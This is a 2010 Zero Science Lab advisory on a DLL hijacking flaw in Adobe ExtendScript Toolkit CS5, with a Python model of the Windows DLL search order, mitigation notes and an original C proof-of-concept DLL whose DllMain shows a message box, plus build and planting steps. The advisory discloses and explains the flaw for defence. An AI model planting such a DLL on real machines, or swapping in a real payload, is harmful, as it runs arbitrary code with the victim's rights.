Title: Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4952
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010
The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility included with Adobe® Creative Suite CS5 and other Adobe applications. The ESTK is used for creating, editing, and debugging JavaScript to be used for scripting Adobe applications.
Adobe ExtendScript Toolkit CS5 suffers from a DLL hijacking vulnerability that lets an attacker execute arbitrary code with the privileges of the user who opens a .jsx file. When a .jsx file is opened, ESTK loads dwmapi.dll by name only, so Windows walks its DLL search order and, when no legitimate copy is found earlier in that order, loads a dwmapi.dll planted in the current working directory, which the shell sets to the folder holding the .jsx file (a network share or removable media, hence Local/Remote). Windows XP, the tested platform, ships no dwmapi.dll in System32 at all (the Desktop Window Manager API was introduced with Windows Vista), so the search always reaches the attacker-controlled directory.
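The description above leaves the loader behaviour implicit. The following Python model of the Windows DLL search order is an added example written for this page; it is not the advisory's PoC and not Adobe code, and it reads no real filesystem. The ESTK install path, the share name and the set of files present on each sample host are constructed assumptions. It shows why the hijack works on XP (no dwmapi.dll in System32, so resolution falls through to the current directory), why a patched Vista or later host picks the System32 copy unless SafeDllSearchMode has been disabled, and what the KB2264107 CWDIllegalInDllSearch registry value changes.

```python
"""Model of the Windows DLL search order, used to reason about the ESTK dwmapi.dll hijack.

Added example for this advisory: not the ZSL PoC, not Adobe code, touches no real
filesystem.  Every path and file below is constructed sample data.
"""
from dataclasses import dataclass, field

LOCAL = "local"     # CWD on a local fixed disk
REMOTE = "remote"   # CWD on an SMB/UNC share
WEBDAV = "webdav"   # CWD on a WebDAV share


@dataclass
class Host:
    app_dir: str
    system_dir: str
    windows_dir: str
    cwd: str
    cwd_kind: str                        # LOCAL, REMOTE or WEBDAV
    path_dirs: list
    files: set                           # full paths of files that exist on this host
    known_dlls: set = field(default_factory=set)   # names listed under KnownDLLs
    safe_dll_search_mode: bool = True    # Session Manager\SafeDllSearchMode, default 1 since XP SP2
    cwd_illegal_in_dll_search: int = 0   # Session Manager\CWDIllegalInDllSearch (KB2264107)

    def cwd_searched(self) -> bool:
        """KB2264107 semantics: 0xFFFFFFFF never searches the CWD, 2 skips it when the
        CWD is remote (SMB or WebDAV), 1 skips it only for WebDAV, 0 keeps legacy behaviour."""
        v = self.cwd_illegal_in_dll_search
        if v == 0xFFFFFFFF:
            return False
        if v == 2 and self.cwd_kind in (REMOTE, WEBDAV):
            return False
        if v == 1 and self.cwd_kind == WEBDAV:
            return False
        return True

    def search_order(self) -> list:
        """Directories probed, in order, for a LoadLibrary("name.dll") call."""
        order = [self.app_dir]
        if not self.safe_dll_search_mode and self.cwd_searched():
            order.append(self.cwd)                       # legacy order: CWD right after the app dir
        order += [self.system_dir, self.windows_dir]     # 16-bit system dir omitted for brevity
        if self.safe_dll_search_mode and self.cwd_searched():
            order.append(self.cwd)                       # safe order: CWD only after the system dirs
        order += list(self.path_dirs)
        return order

    def resolve(self, dll: str):
        """Path the loader would map for `dll`, or None when the load fails."""
        if dll.lower() in {k.lower() for k in self.known_dlls}:
            return self.system_dir + "\\" + dll          # KnownDLLs always come from System32
        present = {p.lower() for p in self.files}
        for directory in self.search_order():
            candidate = directory + "\\" + dll
            if candidate.lower() in present:
                return candidate
        return None


# Constructed sample data; the ESTK install directory is an assumption for the example.
ESTK_DIR = r"C:\Program Files\Adobe\Adobe Utilities - CS5\ExtendScript Toolkit CS5"
SYSTEM32 = r"C:\WINDOWS\system32"
WINDIR = r"C:\WINDOWS"
SHARE = r"\\attacker\docs"        # folder where the victim double-clicks test.jsx


def make_host(dwmapi_in_system32: bool, cwd_kind: str = REMOTE,
              cwd_policy: int = 0, safe: bool = True) -> Host:
    files = {SYSTEM32 + r"\kernel32.dll", SHARE + r"\test.jsx", SHARE + r"\dwmapi.dll"}
    if dwmapi_in_system32:                # Vista and later ship a real dwmapi.dll; XP does not
        files.add(SYSTEM32 + r"\dwmapi.dll")
    return Host(app_dir=ESTK_DIR, system_dir=SYSTEM32, windows_dir=WINDIR, cwd=SHARE,
                cwd_kind=cwd_kind, path_dirs=[SYSTEM32, WINDIR], files=files,
                known_dlls={"kernel32.dll", "user32.dll"}, safe_dll_search_mode=safe,
                cwd_illegal_in_dll_search=cwd_policy)


def xp_default():        # XP SP3 as tested: planted copy wins
    return make_host(False).resolve("dwmapi.dll")

def vista_default():     # real dwmapi.dll in System32 is found before the CWD
    return make_host(True).resolve("dwmapi.dll")

def vista_unsafe_mode(): # SafeDllSearchMode=0 moves the CWD ahead of System32 again
    return make_host(True, safe=False).resolve("dwmapi.dll")

def xp_kb2264107():      # CWDIllegalInDllSearch=2 on XP: remote CWD skipped, load fails, no hijack
    return make_host(False, cwd_policy=2).resolve("dwmapi.dll")


if __name__ == "__main__":
    for label, fn in (("XP", xp_default), ("Vista", vista_default),
                      ("Vista, SafeDllSearchMode=0", vista_unsafe_mode),
                      ("XP, CWDIllegalInDllSearch=2", xp_kb2264107)):
        print(f"{label}: {fn()}")
```

The model also explains the vendor-side fix: loading dwmapi.dll with an absolute System32 path (or via `LoadLibraryEx` with a restricted search flag) removes the CWD from the picture entirely, while the KB2264107 registry value is the only knob an administrator had on XP, where no legitimate dwmapi.dll exists to shadow the planted one.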
Vendor: Adobe Systems Inc. - <http://www.adobe.com>
Affected Version: CS5 v3.5.0.52 (ExtendScript 4.1.23, ScriptUI 5.1.37)
Tested On: Microsoft Windows XP Professional SP3 (English)
N/A
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
[1] <http://www.exploit-db.com/exploits/14785>
[2] <http://packetstormsecurity.org/filedesc/adobeest_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8780>
[4] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[5] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[6] <http://www.vupen.com/english/advisories/2010/2213>
[7] <http://osvdb.org/show/osvdb/67550>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3155>
[9] <http://www.securityfocus.com/bid/42749>
[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4] and [5]
[28.08.2010] - Added reference [6] and [7]
[31.08.2010] - Added reference [8]
[13.11.2010] - Added reference [9]
Zero Science Lab
Web: <http://www.zeroscience.mk>
/*
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Vendor: Adobe Systems Inc.
Product Web Page: http://www.adobe.com
Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
included with Adobe® Creative Suite CS5 and other Adobe applications.
The ESTK is used for creating, editing, and debugging JavaScript to be
used for scripting Adobe applications.
Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local level. The
vulnerable extension is .jsx thru dwmapi.dll library.
----
gcc -shared -o dwmapi.dll adobeest.c
Compile with MinGW as above (the -o flag already names the output dwmapi.dll),
create an empty test.jsx, put both files in the same directory and open
test.jsx with ESTK. The planted dwmapi.dll is loaded from that directory and
its DllMain pops the message box.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>

/* Payload. The PoC only pops a message box to prove the planted DLL was
   mapped into ESTK.exe; anything placed here runs with the user's rights. */
static int dll_mll(void)
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the loader maps dwmapi.dll into the process. */
        dll_mll();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}